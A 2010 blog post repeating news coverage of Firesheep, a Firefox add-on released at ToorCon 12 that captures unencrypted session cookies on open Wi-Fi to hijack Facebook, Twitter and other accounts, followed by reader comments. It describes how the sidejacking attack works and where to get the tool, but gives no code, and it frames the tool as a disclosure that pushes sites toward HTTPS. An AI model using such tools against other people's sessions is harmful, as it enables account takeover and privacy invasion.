Lettori fissi

mercoledì 27 ottobre 2010

Firefox Add-On Can Hijack Facebook, Twitter

A freelance software developer has created a Firefox plug-in that allows the user to scan a network and steal cookies for hijacking user accounts.
Monday at the ToorCon 12 security conference, Seattle-based freelance software developer Eric Butler a announced the release of Firesheep,Firefox plug-in that allows a user to scan a Wi-Fi network and hijack another user's access to Twitter, Facebook and many other websites.
According to Butler, the plug-in was created to show how popular websites still leave users exposed despite their "privacy" feature upgrades.
"It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else," he said. "This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy."
Butler suggested that it was pointless to roll out new privacy features when someone can take over the account by accessing cookies. He said that the only real way to resolve the issue is for Facebook and other sites to offer full end-to-end encryption via HTTPS or SSL. "When it comes to user privacy, SSL is the elephant in the room," he added.
Firesheep appears frighteningly simple. After the initial installation, users will see a new sidebar in the Firefox browser located to the left. This area provides a "Start Capturing" button they can press after connecting to an open network. Once another unsuspecting network user accesses a known insecure website, the plug-in will display their name and photo under the button. The Firesheep user can then click on the name and log onto their account.
Currently Firesheep can be downloaded here for Windows and OS X, however Windows users will need to install WinPcap first.
Tuesday Butler said that Firesheep had become the #10 trending search on Google in the U.S. The plug-in has also been downloaded 129,000 over the past twenty-four hours and has become one of the “Top Tweets” on Twitter. "I’ve received a ton of great messages from people who are happy that this issue has finally received widespread attention, so after day one I’m happy with the result," he said.

21 commenti:

  1. WHOA thats pretty crazy. WPA is with a hex is the way to go! :p

    RispondiElimina
  2. I have heard of this before but its kinda nice to know how it works, thanks man

    RispondiElimina
  3. Exactly why I disable all my Firefox addons.

    Nice blog, followed ;) Come follow mine :)

    RispondiElimina
  4. I've been reading about this guy, nice defamation of character hack. :D

    RispondiElimina
  5. I read about this. I am surprised that it is so easy to access other peoples accounts.

    RispondiElimina
  6. i will download this add on :D

    RispondiElimina
  7. wow, is there a way to fix this security hole?

    RispondiElimina
  8. yup smart people use chrome

    RispondiElimina
  9. Wow really??? Thanks for the info man.

    RispondiElimina
  10. This is just the renewal of old school applications like Wireshark and Ethereal. Nothing that wasn't already possible, just employs more GUI.

    RispondiElimina
  11. is there anything firefox addons cant do

    RispondiElimina
  12. My facebook account got Hijacked and they wont let me log in anymore unless i recognize a random set of friends i have which I don't know half of them very well. It seems like facebook is offering me several friends a day I don't even know. Though I'm smart enough not to add them on my new fb. I did have a wireless modem at the time but it must be hard to get in ? idk.....

    RispondiElimina